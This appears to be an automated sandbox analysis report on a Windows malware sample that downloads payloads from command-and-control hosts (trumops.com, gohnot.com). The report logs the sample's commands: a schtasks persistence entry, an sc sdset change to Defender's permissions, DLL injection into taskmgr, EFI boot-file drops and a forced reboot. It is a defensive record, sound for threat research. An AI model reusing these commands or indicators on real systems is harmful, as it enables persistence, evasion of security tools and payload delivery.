Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: upd.exe, 00000008.00000002.351356403.000000001180A000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBro
Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/
Source: svchost.exe, 0000001F.00000003.410443706.000002A1989AE000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 192Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: runmodes.com
Source: global traffic HTTP traffic detected: GET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1Host: server16.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1Host: server2.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 442b90d2-fde4-485f-a003-6086e2191d6eVersion: 183Accept-Encoding: gzip

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Uses 32bit PE files
Source: 0NlSa5bf55.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 5.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9af2e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9a76e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 5.2.upd.exe.9af2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 5.2.upd.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Creates files inside the system directory
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 36_2_00007FF7019B27F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D8A4C 36_2_00007FF7019D8A4C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CC25C 36_2_00007FF7019CC25C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B41F0 36_2_00007FF7019B41F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C7950 36_2_00007FF7019C7950
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019DA174 36_2_00007FF7019DA174
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D74FC 36_2_00007FF7019D74FC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D03B0 36_2_00007FF7019D03B0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 36_2_00007FF7019D5C10
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B3370 36_2_00007FF7019B3370
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C8549 36_2_00007FF7019C8549
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CD558 36_2_00007FF7019CD558
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CF908 36_2_00007FF7019CF908
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D48D8 36_2_00007FF7019D48D8
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C58EC 36_2_00007FF7019C58EC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C8040 36_2_00007FF7019C8040
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C4830 36_2_00007FF7019C4830
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D2864 36_2_00007FF7019D2864
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CF070 36_2_00007FF7019CF070
PE file does not import any functions
Source: EfiGuardDxe.efi.11.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.11.dr Static PE information: No import functions for PE file found
Source: bootx64.efi.11.dr Static PE information: No import functions for PE file found
Enables security privileges
Source: C:\Windows\SysWOW64\sc.exe Process token adjusted: Security
Source: 0NlSa5bf55.exe Virustotal: Detection: 66%
Source: 0NlSa5bf55.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\0NlSa5bf55.exe "C:\Users\user\Desktop\0NlSa5bf55.exe"
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Users\user\Desktop\upd.exe "C:\Users\user\Desktop\upd.exe" -update
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\windefender.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: unknown Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to behavior
Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Users\user\Desktop\upd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\windefender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File created: C:\Users\user\Desktop\upd.exe Jump to behavior
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@41/15@21/5
Source: csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp Binary or memory string: SELECT BuildNumber FROM Win32_OperatingSystemh3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle, 36_2_00007FF7019B27F0
Source: 0NlSa5bf55 Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_01
Source: upd.exe String found in binary or memory: application/app/install.go
Source: upd.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: upd.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: upd.exe String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
Source: upd.exe String found in binary or memory: application/app/install.go
Source: upd.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: upd.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: upd.exe String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
Source: 0NlSa5bf55.exe String found in binary or memory: Mask/AddresOEnv
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 0NlSa5bf55.exe Static file information: File size 2095616 > 1048576
Source: 0NlSa5bf55.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1ff600
Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
